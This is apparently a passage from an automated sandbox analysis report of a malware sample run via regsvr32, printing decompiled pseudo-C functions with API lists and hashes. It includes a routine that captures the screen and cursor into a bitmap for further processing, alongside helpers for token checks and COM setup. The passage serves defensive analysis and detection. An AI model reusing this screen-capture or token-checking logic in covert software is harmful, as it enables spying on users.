            • Opcode ID: 8943fc75121563636d350534ac23d63538b52a9ac4f7734c3637b5c76cda592e
            • Instruction ID: 2904d409f40f612f07d6b6758ef7928c4a5f36467e419102011ccae1b38e40e8
            • Opcode Fuzzy Hash: 8943fc75121563636d350534ac23d63538b52a9ac4f7734c3637b5c76cda592e
            • Instruction Fuzzy Hash: 14F0A732700114BBD705BBADD9A895AB3EDDFC83A5714463AF506D7150DA70CD008BD1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 027ACA6B Relevance: 1.6, APIs: 1, Instructions: 82COMMON
            Download Yara Rule
            C-Code - Quality: 47%
            			E027ACA6B(void* __ecx, void* __esi) {
				intOrPtr* _v8;
				char _v12;
				void* _v16;
				char _v20;
				char _v24;
				short _v28;
				char _v32;
				void* _t20;
				intOrPtr* _t21;
				intOrPtr _t29;
				intOrPtr _t31;
				intOrPtr* _t33;
				intOrPtr _t34;
				char _t37;
				union _TOKEN_INFORMATION_CLASS _t44;
				char _t45;
				intOrPtr* _t48;

				_t37 = 0;
				_v28 = 0x500;
				_t45 = 0;
				_v32 = 0;
				_t20 = E027AC940(__ecx);
				_v16 = _t20;
				if(_t20 != 0) {
					_push( &_v24);
					_t44 = 2;
					_t21 = E027AC997(_t44); // executed
					_t48 = _t21;
					_v20 = _t48;
					if(_t48 == 0) {
						L10:
						FindCloseChangeNotification(_v16);
						if(_t48 != 0) {
							E027A8D86( &_v20, _t37);
						}
						return _t45;
					}
					_push( &_v12);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0x220);
					_push(0x20);
					_push(2);
					_push( &_v32);
					_t29 =  *0x27bf8e8; // 0x47ffab0
					if( *((intOrPtr*)(_t29 + 0xc))() == 0) {
						goto L10;
					}
					if( *_t48 <= 0) {
						L9:
						_t31 =  *0x27bf8e8; // 0x47ffab0
						 *((intOrPtr*)(_t31 + 0x10))(_v12);
						_t37 = 0;
						goto L10;
					}
					_t9 = _t48 + 4; // 0x4
					_t33 = _t9;
					_v8 = _t33;
					while(1) {
						_push(_v12);
						_push( *_t33);
						_t34 =  *0x27bf8e8; // 0x47ffab0
						if( *((intOrPtr*)(_t34 + 0x68))() != 0) {
							break;
						}
						_t37 = _t37 + 1;
						_t33 = _v8 + 8;
						_v8 = _t33;
						if(_t37 <  *_t48) {
							continue;
						}
						goto L9;
					}
					_t45 = 1;
					goto L9;
				}
				return _t20;
			}




















            0x027aca72
            0x027aca74
            0x027aca7b
            0x027aca7d
            0x027aca80
            0x027aca85
            0x027aca8a
            0x027aca94
            0x027aca97
            0x027aca9a
            0x027aca9f
            0x027acaa1
            0x027acaa7
            0x027acb07
            0x027acb0f
            0x027acb15
            0x027acb1c
            0x027acb22
            0x00000000
            0x027acb23
            0x027acaac
            0x027acaad
            0x027acaae
            0x027acaaf
            0x027acab0
            0x027acab1
            0x027acab2
            0x027acab3
            0x027acab8
            0x027acaba
            0x027acabf
            0x027acac0
            0x027acaca
            0x00000000
            0x00000000
            0x027acace
            0x027acafa
            0x027acafa
            0x027acb02
            0x027acb05
            0x00000000
            0x027acb05
            0x027acad0
            0x027acad0
            0x027acad3
            0x027acad6
            0x027acad6
            0x027acad9
            0x027acadb
            0x027acae5
            0x00000000
            0x00000000
            0x027acaea
            0x027acaeb
            0x027acaee
            0x027acaf3
            0x00000000
            0x00000000
            0x00000000
            0x027acaf5
            0x027acaf9
            0x00000000
            0x027acaf9
            0x027acb28

            APIs
              • Part of subcall function 027AC940: GetCurrentThread.KERNEL32 ref: 027AC953
              • Part of subcall function 027AC940: GetLastError.KERNEL32(?,?,027ACA85,00000000,027A0000), ref: 027AC961
              • Part of subcall function 027AC997: GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,00000000,00001644,027A0000,00000000,00000000,?,027ACA18,00000000,00000000,?,027ACA41), ref: 027AC9B2
              • Part of subcall function 027AC997: GetLastError.KERNEL32(?,027ACA18,00000000,00000000,?,027ACA41,00001644,?,027AE0D1), ref: 027AC9B9
            • FindCloseChangeNotification.KERNELBASE(?,00001644,00000000,027A0000), ref: 027ACB0F
            Memory Dump Source
            • Source File: 00000002.00000002.385314115.00000000027A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 027A0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_27a0000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: ErrorLast$ChangeCloseCurrentFindInformationNotificationThreadToken
            • String ID:
            • API String ID: 3430231349-0
            • Opcode ID: b73cef916fa2cb5f69df33ab08fd6c71c1d748ff0004064b384da2c6fb5422d5
            • Instruction ID: 9e6628482b1ac5bda3e8ba646f0e8e8199c037f131b8a9294d3632d4ef5ec221
            • Opcode Fuzzy Hash: b73cef916fa2cb5f69df33ab08fd6c71c1d748ff0004064b384da2c6fb5422d5
            • Instruction Fuzzy Hash: AB216A32A00204AFDB12DFA9D899EAEB7F8EF88720B10456AE502E7250D7309A01CB50
            Uniqueness

            Uniqueness Score: -1.00%

            Function 027A6348 Relevance: 1.5, APIs: 1, Instructions: 40COMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E027A6348(void* __fp0) {
				void* __ecx;
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				intOrPtr _t17;
				intOrPtr _t20;
				void* _t25;
				intOrPtr _t26;
				void* _t27;

				_t32 = __fp0;
				E027A64C2();
				GetOEMCP();
				_t13 = E027AE040(__fp0); // executed
				 *0x27bf8e4 = _t13;
				if(_t13 != 0) {
					 *((intOrPtr*)(_t13 + 0xa0)) = 1;
					_t14 =  *0x27bf8e4; // 0x47ffc00
					E027B3C53( *((intOrPtr*)(_t14 + 0x224)));
					_t26 =  *0x27bf8e4; // 0x47ffc00
					_t25 = _t27;
					__eflags =  *(_t26 + 0x1898) & 0x00010000;
					if(( *(_t26 + 0x1898) & 0x00010000) == 0) {
						_t16 = E027AD907(_t26); // executed
						__eflags = _t16;
						_t17 =  *0x27bf8e4; // 0x47ffc00
						if(_t16 != 0) {
							__eflags =  *((intOrPtr*)(_t17 + 0x214)) - 3;
							if( *((intOrPtr*)(_t17 + 0x214)) != 3) {
								L10:
								__eflags = 0;
								return 0;
							}
							L9:
							E027A3540();
							goto L10;
						}
						 *((intOrPtr*)(_t17 + 0xa4)) = 1;
						L6:
						_t20 =  *0x27bf8e4; // 0x47ffc00
						__eflags =  *((intOrPtr*)(_t20 + 0x214)) - 3;
						if(__eflags == 0) {
							goto L9;
						}
						E027A618E(_t25, _t26, __eflags, _t32);
						goto L10;
					}
					 *((intOrPtr*)(_t26 + 0xa4)) = 1;
					goto L6;
				}
				return _t13 + 1;
			}












            0x027a6348
            0x027a6348
            0x027a634d
            0x027a6354
            0x027a6359
            0x027a6361
            0x027a636a
            0x027a6370
            0x027a637b
            0x027a6380
            0x027a6386
            0x027a6387
            0x027a6391
            0x027a63a1
            0x027a63a6
            0x027a63a8
            0x027a63ad
            0x027a63ca
            0x027a63d1
            0x027a63d8
            0x027a63d8
            0x00000000
            0x027a63da
            0x027a63d3
            0x027a63d3
            0x00000000
            0x027a63d3
            0x027a63af
            0x027a63b5
            0x027a63b5
            0x027a63ba
            0x027a63c1
            0x00000000
            0x00000000
            0x027a63c3
            0x00000000
            0x027a63c3
            0x027a6393
            0x00000000
            0x027a6393
            0x00000000

            APIs
            • GetOEMCP.KERNEL32 ref: 027A634D
              • Part of subcall function 027AE040: GetCurrentProcessId.KERNEL32 ref: 027AE067
              • Part of subcall function 027AE040: GetLastError.KERNEL32 ref: 027AE161
              • Part of subcall function 027AE040: GetSystemMetrics.USER32(00001000), ref: 027AE171
            Memory Dump Source
            • Source File: 00000002.00000002.385314115.00000000027A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 027A0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_27a0000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: CurrentErrorLastMetricsProcessSystem
            • String ID:
            • API String ID: 1196160345-0
            • Opcode ID: 416aedc4f119bdcf98269376e206ffc70d6c348ef45152e9efefd34faf484746
            • Instruction ID: 2c49633c3e02e84a8454037722f176b5f03197281bfcc52a24991e7bef71c22e
            • Opcode Fuzzy Hash: 416aedc4f119bdcf98269376e206ffc70d6c348ef45152e9efefd34faf484746
            • Instruction Fuzzy Hash: 2D017C75505212CFCB06EB64DA2DBA672E9EB85720F1D4BB6E11D8A510C7B04452CB92
            Uniqueness

            Uniqueness Score: -1.00%

            Function 6D50B523 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
            Download Yara Rule
            C-Code - Quality: 95%
            			E6D50B523(void* __ecx, signed int _a4, signed int _a8) {
				void* __esi;
				void* _t8;
				void* _t12;
				signed int _t13;
				void* _t15;
				signed int _t16;
				signed int _t18;
				long _t19;

				_t15 = __ecx;
				_t18 = _a4;
				if(_t18 == 0) {
					L2:
					_t19 = _t18 * _a8;
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0x6d55dd9c, 8, _t19); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = E6D50E89B();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E6D50BF62())) = 0xc;
							__eflags = 0;
							return 0;
						}
						_t12 = E6D50E440(_t15, _t16, _t19, __eflags, _t19);
						_pop(_t15);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				_t16 = _t13 % _t18;
				if(_t13 / _t18 < _a8) {
					goto L8;
				}
				goto L2;
			}











            0x6d50b523
            0x6d50b529
            0x6d50b52e
            0x6d50b53c
            0x6d50b53c
            0x6d50b542
            0x6d50b544
            0x6d50b544
            0x6d50b55b
            0x6d50b564
            0x6d50b56c
            0x00000000
            0x00000000
            0x6d50b54c
            0x6d50b54e
            0x6d50b570
            0x6d50b575
            0x6d50b57b
            0x00000000
            0x6d50b57b
            0x6d50b551
            0x6d50b556
            0x6d50b557
            0x6d50b559
            0x00000000
            0x00000000
            0x6d50b559
            0x00000000
            0x6d50b55b
            0x6d50b534
            0x6d50b535
            0x6d50b53a
            0x00000000
            0x00000000
            0x00000000

            APIs
            • RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,6D50C909,00000001,00000364,?,6D50B06B,00000001,00000001), ref: 6D50B564
            Memory Dump Source
            • Source File: 00000002.00000002.385586279.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000002.00000002.385570851.000000006D500000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.385653547.000000006D51B000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.385728691.000000006D540000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.385742413.000000006D541000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.385767720.000000006D55C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.385779816.000000006D55F000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_6d500000_regsvr32.jbxd
            Similarity
            • API ID: AllocateHeap
            • String ID:
            • API String ID: 1279760036-0
            • Opcode ID: 416a99699eed813a63527157329eed2eabf9a2cda9a6c289b6abbac09fcd6f18
            • Instruction ID: a8d537adba703a09d85395ba6be132989cfe8e3d70b269524275c5e12efb1edd
            • Opcode Fuzzy Hash: 416a99699eed813a63527157329eed2eabf9a2cda9a6c289b6abbac09fcd6f18
            • Instruction Fuzzy Hash: F1F02B3174412596DB197A25688471A3B58AF91760F168491ED14D6DC0FB20DD0045A1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 027ACA1B Relevance: 1.5, APIs: 1, Instructions: 34COMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E027ACA1B(void* __ecx) {
				signed int _v8;
				intOrPtr _t12;
				void* _t13;
				void* _t14;
				void* _t17;
				intOrPtr _t18;
				void* _t23;

				_v8 = _v8 & 0x00000000;
				_t12 =  *0x27bf8e8; // 0x47ffab0
				_t13 =  *((intOrPtr*)(_t12 + 0x70))(__ecx, 8,  &_v8, __ecx);
				if(_t13 != 0) {
					_t14 = E027ACA04(); // executed
					_t23 = _t14;
					if(_t23 != 0) {
						FindCloseChangeNotification(_v8);
						_t17 = _t23;
					} else {
						if(_v8 != _t14) {
							_t18 =  *0x27bf8e0; // 0x47ff8c0
							 *((intOrPtr*)(_t18 + 0x30))(_v8);
						}
						_t17 = 0;
					}
					return _t17;
				} else {
					return _t13;
				}
			}










            0x027aca1f
            0x027aca27
            0x027aca2f
            0x027aca34
            0x027aca3c
            0x027aca41
            0x027aca45
            0x027aca63
            0x027aca66
            0x027aca47
            0x027aca4a
            0x027aca4c
            0x027aca54
            0x027aca54
            0x027aca57
            0x027aca57
            0x027aca6a
            0x027aca37
            0x027aca37
            0x027aca37

            Memory Dump Source
            • Source File: 00000002.00000002.385314115.00000000027A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 027A0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_27a0000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 4b6bfa0359c5610a3ddd3e45019c89e76c3159bb08c9737b449da2d518694386
            • Instruction ID: 214e7d9df84b7883da679e92b674fb094fcbab2a6f6b1691a37bbf688007d901
            • Opcode Fuzzy Hash: 4b6bfa0359c5610a3ddd3e45019c89e76c3159bb08c9737b449da2d518694386
            • Instruction Fuzzy Hash: 12F01732A50108FBCF12DBA4D916FAD73E8FB44699B104599E502E7550DB34DA00EB95
            Uniqueness

            Uniqueness Score: -1.00%

            Function 027A63DE Relevance: 1.5, APIs: 1, Instructions: 9COMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E027A63DE() {
				intOrPtr _t3;

				_t3 =  *0x27bf8e0; // 0x47ff8c0
				 *((intOrPtr*)(_t3 + 0x2c))( *0x27bf904, 0xffffffff);
				ExitProcess(0);
			}




            0x027a63de
            0x027a63eb
            0x027a63f5

            APIs
            • ExitProcess.KERNEL32(00000000), ref: 027A63F5
            Memory Dump Source
            • Source File: 00000002.00000002.385314115.00000000027A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 027A0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_27a0000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: ExitProcess
            • String ID:
            • API String ID: 621844428-0
            • Opcode ID: b0f225fe550a649d869504ecc194ee86771c423e97028b89e7cbeb9ba0088c3f
            • Instruction ID: 814fe0ff14adbee501df4793cd49dc98b6db3422a25598da88562b7021c04595
            • Opcode Fuzzy Hash: b0f225fe550a649d869504ecc194ee86771c423e97028b89e7cbeb9ba0088c3f
            • Instruction Fuzzy Hash: 00C002715550109FCB415B68DD49F1437E0FB4C761F158E54F519D65E5CB3455109B01
            Uniqueness

            Uniqueness Score: -1.00%

            Function 027A8D70 Relevance: 1.5, APIs: 1, Instructions: 8memoryCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E027A8D70(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0x27bf9c8, 8, _a4); // executed
				return _t2;
			}




            0x027a8d7e
            0x027a8d85

            APIs
            • RtlAllocateHeap.NTDLL(00000008,?,?,027A973A,00000100,?,027A65BF), ref: 027A8D7E
            Memory Dump Source
            • Source File: 00000002.00000002.385314115.00000000027A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 027A0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_27a0000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: AllocateHeap
            • String ID:
            • API String ID: 1279760036-0
            • Opcode ID: 21254b06aed1f1bacbe74b1cc2481c0356e44c9e3f9a1df1219402fed6eeb921
            • Instruction ID: f13db4d6ef5c8522e6ec4e0c6b47886d69b7e7d9da9cfac14164ff1da4638a01
            • Opcode Fuzzy Hash: 21254b06aed1f1bacbe74b1cc2481c0356e44c9e3f9a1df1219402fed6eeb921
            • Instruction Fuzzy Hash: B5B092358C0208FBCF021E81EC05F843F29EB08B51F008411F708484608A7364709FA1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 027ADB5A Relevance: 1.5, APIs: 1, Instructions: 7threadCOMMON
            Download Yara Rule
            C-Code - Quality: 58%
            			E027ADB5A(void* __ecx) {
				signed int _t4;

				_t4 = ResumeThread( *(__ecx + 4));
				asm("sbb eax, eax");
				return  ~_t4 & 0x00000001;
			}




            0x027adb62
            0x027adb6a
            0x027adb6f

            APIs
            • ResumeThread.KERNELBASE(?,027AD9C5,?,?,00000001), ref: 027ADB62
            Memory Dump Source
            • Source File: 00000002.00000002.385314115.00000000027A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 027A0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_27a0000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: ResumeThread
            • String ID:
            • API String ID: 947044025-0
            • Opcode ID: a48d372895475ca2e1ae41b3b4e7371a31cf3eb24a804050eb6525d384a07c59
            • Instruction ID: c03304f9ac6c471ad0e868628d6f1b68fa3497f2b28732fabf095d0e2594c8e2
            • Opcode Fuzzy Hash: a48d372895475ca2e1ae41b3b4e7371a31cf3eb24a804050eb6525d384a07c59
            • Instruction Fuzzy Hash: 57B092322A00019BCB015B78DC0BEA03BE0FB56A067A8CAE4F005C6461C22EC4559A40
            Uniqueness

            Uniqueness Score: -1.00%

            Function 027A8D5B Relevance: 1.5, APIs: 1, Instructions: 6memoryCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E027A8D5B() {
				void* _t1;

				_t1 = HeapCreate(0, 0x96000, 0); // executed
				 *0x27bf9c8 = _t1;
				return _t1;
			}




            0x027a8d64
            0x027a8d6a
            0x027a8d6f

            APIs
            • HeapCreate.KERNELBASE(00000000,00096000,00000000,027A65BA), ref: 027A8D64
            Memory Dump Source
            • Source File: 00000002.00000002.385314115.00000000027A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 027A0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_27a0000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: CreateHeap
            • String ID:
            • API String ID: 10892065-0
            • Opcode ID: bdcf511707d86d7332bd357ac7793486fa6b16ff7918ba990f98fa31abfdc492
            • Instruction ID: 2d80acf31b9388965ca694b34675ac19ce0051a0f4d32a9b8dfc517007e7b1b6
            • Opcode Fuzzy Hash: bdcf511707d86d7332bd357ac7793486fa6b16ff7918ba990f98fa31abfdc492
            • Instruction Fuzzy Hash: 5DB01270EC1300F6DB510F205C46F0035106344F02F208402F709981C0C6B010209D15
            Uniqueness

            Uniqueness Score: -1.00%

            Function 027ADB70 Relevance: 1.3, APIs: 1, Instructions: 50sleepCOMMON
            Download Yara Rule
            C-Code - Quality: 91%
            			E027ADB70(void* __ecx, intOrPtr _a4, signed int _a8) {
				signed int _v8;
				intOrPtr _v12;
				signed int _t26;
				signed int _t28;
				signed int* _t36;
				signed int* _t39;

				_push(__ecx);
				_push(__ecx);
				_t36 = _a8;
				_t28 = _t36[1];
				if(_t28 != 0) {
					_t39 = _t36[2];
					do {
						_a8 = _a8 & 0x00000000;
						if(_t39[2] > 0) {
							_t31 = _t39[3];
							_t22 = _a4 + 0x24;
							_v12 = _a4 + 0x24;
							_v8 = _t39[3];
							while(E027AA240(_t22,  *_t31) != 0) {
								_t26 = _a8 + 1;
								_t31 = _v8 + 4;
								_a8 = _t26;
								_t22 = _v12;
								_v8 = _v8 + 4;
								if(_t26 < _t39[2]) {
									continue;
								} else {
								}
								goto L8;
							}
							 *_t36 =  *_t36 |  *_t39;
						}
						L8:
						_t39 =  &(_t39[4]);
						_t28 = _t28 - 1;
					} while (_t28 != 0);
				}
				Sleep(0xa);
				return 1;
			}









            0x027adb73
            0x027adb74
            0x027adb77
            0x027adb7a
            0x027adb7f
            0x027adb82
            0x027adb85
            0x027adb85
            0x027adb8d
            0x027adb92
            0x027adb95
            0x027adb98
            0x027adb9b
            0x027adb9e
            0x027adbb1
            0x027adbb2
            0x027adbb5
            0x027adbbb
            0x027adbbe
            0x027adbc1
            0x00000000
            0x00000000
            0x027adbc3
            0x00000000
            0x027adbc1
            0x027adbc7
            0x027adbc7
            0x027adbc9
            0x027adbc9
            0x027adbcc
            0x027adbcc
            0x027adbd1
            0x027adbd9
            0x027adbe5

            APIs
            • Sleep.KERNELBASE(0000000A), ref: 027ADBD9
            Memory Dump Source
            • Source File: 00000002.00000002.385314115.00000000027A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 027A0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_27a0000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: Sleep
            • String ID:
            • API String ID: 3472027048-0
            • Opcode ID: 084b3cf0b09598eb726ed8ac4790d24f285529aebbc3cd385a31814a3f99d913
            • Instruction ID: f6efe567c338e74487a40a7f1fce4d934c59ce7e67a507f497c59cea6b73da50
            • Opcode Fuzzy Hash: 084b3cf0b09598eb726ed8ac4790d24f285529aebbc3cd385a31814a3f99d913
            • Instruction Fuzzy Hash: 23111B71A01205EFEB24CF99D895B99B7F8FB88325F10896AE85A9B740D774E940CB40
            Uniqueness

            Uniqueness Score: -1.00%

            Non-executed Functions

            Function 027A5CC4 Relevance: 35.2, APIs: 18, Strings: 2, Instructions: 223windowCOMMON
            Download Yara Rule
            C-Code - Quality: 98%
            			E027A5CC4(int* __ecx) {
				signed int _v8;
				char _v12;
				int _v16;
				struct HWND__* _v20;
				struct HWND__* _v24;
				struct HDC__* _v28;
				void* _v32;
				int* _v36;
				void* _v40;
				void* _v44;
				void* _v48;
				void* _v52;
				void* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				short _v82;
				short _v84;
				signed int _v88;
				signed int _v92;
				struct tagBITMAPINFO _v96;
				intOrPtr _v102;
				int _v110;
				char _v112;
				void* _v116;
				void* _v120;
				void* _v124;
				void* _v132;
				void* _v136;
				void* _v140;
				int _v156;
				signed int _v160;
				void _v164;
				int _t82;
				void* _t84;
				signed int _t92;
				void* _t99;
				char _t103;
				intOrPtr _t113;
				int* _t114;
				struct HDC__* _t120;
				signed int _t124;
				short _t137;
				struct HDC__* _t141;
				void* _t144;
				void* _t148;

				_v36 = __ecx;
				_v24 = 0;
				_t120 = 0;
				_v12 = 0;
				_t144 = 0;
				_v20 = 0;
				_t141 = GetDC(0);
				_v28 = _t141;
				if(_t141 != 0) {
					_t120 = CreateCompatibleDC(_t141);
					if(_t120 != 0) {
						_v8 = GetDeviceCaps(_t141, 8);
						_t82 = GetDeviceCaps(_t141, 0xa);
						_v16 = _t82;
						_t144 = CreateCompatibleBitmap(_t141, _v8, _t82);
						if(_t144 != 0) {
							_t84 = SelectObject(_t120, _t144);
							_v32 = _t84;
							if(_t84 != 0) {
								_t144 = SelectObject(_t120, _v32);
								if(_t144 != 0) {
									GetObjectW(_t144, 0x18,  &_v164);
									_t92 = _v160;
									_t124 = _v156;
									_v92 = _t92;
									_v84 = 1;
									_t137 = 0x20;
									_v82 = _t137;
									_v96.bmiHeader = 0x28;
									_v80 = 0;
									_v76 = 0;
									_v72 = 0;
									_v68 = 0;
									_v64 = 0;
									_v60 = 0;
									asm("cdq");
									_v88 = _t124;
									_v8 = ((_t92 << 5) + 0x1f >> 5) * _t124 << 2;
									_t99 = E027A8D70(((_t92 << 5) + 0x1f >> 5) * _t124 << 2);
									_v20 = _t99;
									if(_t99 != 0) {
										GetDIBits(_t120, _t144, 0, _v156, _t99,  &_v96, 0);
										_v16 = _v8 + 0x36;
										_t103 = E027A8D70(_v8 + 0x36);
										_v12 = _t103;
										if(_t103 != 0) {
											_v110 = _v16;
											_v112 = 0x4d42;
											_v102 = 0x36;
											E027A8E4D(_t103,  &_v112, 0xe);
											E027A8E4D(_v12 + 0xe,  &_v96, 0x28);
											E027A8E4D(_v12 + 0x36, _v20, _v8);
											_t148 = _t148 + 0x24;
											_v8 = _v8 & 0x00000000;
											_t113 = E027AFC7B(_v12, _v16,  &_v8);
											_v24 = _t113;
											if(_t113 != 0) {
												_t114 = _v36;
												if(_t114 != 0) {
													 *_t114 = _v8;
												}
											}
										}
									}
								}
							}
						}
					}
				}
				E027A8D86( &_v20, 0);
				E027A8D86( &_v12, 0);
				if(_t120 != 0) {
					DeleteDC(_t120);
				}
				if(_t141 != 0) {
					DeleteDC(_t141);
				}
				if(_t144 != 0) {
					DeleteObject(_t144);
				}
				return _v24;
			}




















































            0x027a5cd0
            0x027a5cd6
            0x027a5cd9
            0x027a5cdb
            0x027a5cde
            0x027a5ce0
            0x027a5ce9
            0x027a5ceb
            0x027a5cf0
            0x027a5cfd
            0x027a5d01
            0x027a5d15
            0x027a5d18
            0x027a5d1e
            0x027a5d28
            0x027a5d2c
            0x027a5d34
            0x027a5d3a
            0x027a5d3f
            0x027a5dd5
            0x027a5dd9
            0x027a5de9
            0x027a5def
            0x027a5df7
            0x027a5dfe
            0x027a5e01
            0x027a5e0a
            0x027a5e0b
            0x027a5e14
            0x027a5e1b
            0x027a5e1e
            0x027a5e21
            0x027a5e24
            0x027a5e27
            0x027a5e2a
            0x027a5e2d
            0x027a5e31
            0x027a5e40
            0x027a5e43
            0x027a5e48
            0x027a5e4e
            0x027a5e65
            0x027a5e72
            0x027a5e75
            0x027a5e7a
            0x027a5e80
            0x027a5e85
            0x027a5e8d
            0x027a5e98
            0x027a5e9f
            0x027a5eb4
            0x027a5ec9
            0x027a5ed7
            0x027a5eda
            0x027a5edf
            0x027a5ee4
            0x027a5eea
            0x027a5eec
            0x027a5ef1
            0x027a5ef6
            0x027a5ef6
            0x027a5ef1
            0x027a5eea
            0x027a5e80
            0x027a5e4e
            0x027a5dd9
            0x027a5d3f
            0x027a5d2c
            0x027a5d01
            0x027a5efe
            0x027a5f09
            0x027a5f13
            0x027a5f16
            0x027a5f16
            0x027a5f1e
            0x027a5f21
            0x027a5f21
            0x027a5f29
            0x027a5f2c
            0x027a5f2c
            0x027a5f39

            APIs
            • GetDC.USER32(00000000), ref: 027A5CE3
            • CreateCompatibleDC.GDI32(00000000), ref: 027A5CF7
            • GetDeviceCaps.GDI32(00000000,00000008), ref: 027A5D10
            • GetDeviceCaps.GDI32(00000000,0000000A), ref: 027A5D18
            • CreateCompatibleBitmap.GDI32(00000000,?,00000000), ref: 027A5D22
            • SelectObject.GDI32(00000000,00000000), ref: 027A5D34
            • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 027A5D58
            • GetCursorInfo.USER32(?), ref: 027A5D69
            • CopyIcon.USER32 ref: 027A5D7E
            • GetIconInfo.USER32(00000000,?), ref: 027A5D8C
            • GetObjectW.GDI32(?,00000018,?), ref: 027A5DAA
            • DrawIconEx.USER32(00000000,?,?,?,?,?,00000000,00000000,00000003), ref: 027A5DC2
            • SelectObject.GDI32(00000000,?), ref: 027A5DCF
            • GetObjectW.GDI32(00000000,00000018,?), ref: 027A5DE9
            • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000028,00000000), ref: 027A5E65
            • DeleteDC.GDI32(00000000), ref: 027A5F16
            • DeleteDC.GDI32(00000000), ref: 027A5F21
            • DeleteObject.GDI32(00000000), ref: 027A5F2C
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.385314115.00000000027A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 027A0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_27a0000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: Object$DeleteIcon$CapsCompatibleCreateDeviceInfoSelect$BitmapBitsCopyCursorDraw
            • String ID: ($6
            • API String ID: 192358524-4149066357
            • Opcode ID: 4c35caa6a6d36d1c1b2185ad34a69cd4ca5f0228ad93b3072a75f3b7ebb87a0e
            • Instruction ID: 4be966c6c98a3153e9c0239a9e04d490b32f7e6d5eb785cdafcaa5cc7a330c01
            • Opcode Fuzzy Hash: 4c35caa6a6d36d1c1b2185ad34a69cd4ca5f0228ad93b3072a75f3b7ebb87a0e
            • Instruction Fuzzy Hash: 1D8128B2D00219EBDB21CBA5CC59FAEBBB9EF49310F548559E614F7240EB309A05CF60
            Uniqueness

            Uniqueness Score: -1.00%

            Function 027AE503 Relevance: 7.6, APIs: 5, Instructions: 87commemoryCOMMON
            Download Yara Rule
            C-Code - Quality: 30%
            			E027AE503(void* __ecx) {
				char _v8;
				void* _v12;
				char* _t15;
				intOrPtr* _t16;
				void* _t21;
				intOrPtr* _t23;
				intOrPtr* _t24;
				intOrPtr* _t25;
				void* _t30;
				void* _t33;

				_v12 = 0;
				_v8 = 0;
				__imp__CoInitializeEx(0, 0, _t30, _t33, __ecx, __ecx);
				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
				_t15 =  &_v12;
				__imp__CoCreateInstance(0x27bc8a0, 0, 1, 0x27bc8b0, _t15);
				if(_t15 < 0) {
					L5:
					_t23 = _v8;
					if(_t23 != 0) {
						 *((intOrPtr*)( *_t23 + 8))(_t23);
					}
					_t24 = _v12;
					if(_t24 != 0) {
						 *((intOrPtr*)( *_t24 + 8))(_t24);
					}
					_t16 = 0;
				} else {
					__imp__#2(__ecx);
					_t25 = _v12;
